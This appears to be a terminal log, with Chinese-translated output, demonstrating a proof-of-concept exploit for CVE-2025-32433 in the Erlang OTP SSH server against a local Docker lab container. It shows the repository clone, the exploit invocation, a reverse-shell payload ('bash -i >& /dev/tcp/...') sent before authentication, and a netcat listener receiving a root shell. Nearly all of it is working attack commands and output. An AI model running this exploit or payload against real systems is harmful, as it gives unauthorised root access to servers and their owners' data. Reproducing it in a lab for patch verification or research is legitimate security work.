» git clone https://github.com/0xPThree/cve-2025-32433.git && cd cve-2025-32433
» docker build -t erlang-ssh .
» docker run -d --name erlang-ssh -p 2222:2222 erlang-ssh
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
用法: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]
针对CVE-2025-32433 (Erlang OTP SSH服务器)的利用工具。
选项:
-h, --help 显示此帮助信息并退出
-d, --debug 以十六进制格式打印原始响应
-t, --target TARGET 目标主机 (默认: 127.0.0.1)
-p, --port PORT 目标端口 (默认: 2222)
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] 正在连接到SSH服务器...
[✓] 标识: SSH-2.0-Erlang/5.1.4.7
[*] 正在发送KEXINIT...
[*] 正在打开通道...
[?] Shell命令: bash -i >& /dev/tcp/172.17.0.1/4488 0>&1
[*] 正在发送CHANNEL_REQUEST...
[✓] 载荷已发送。
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » nc -lvnp 4488
正在监听 [any] 4488 ...
收到来自 (UNKNOWN) [172.17.0.2] 58338 连接到 [172.17.0.1] 的连接
root@cf0f300797ea:~# id && hostname
uid=0(root) gid=0(root) groups=0(root)
cf0f300797ea
https://0xpthree.gitbook.io/notes/exploits-pocs/erlang/otp-ssh-cve-2025-32433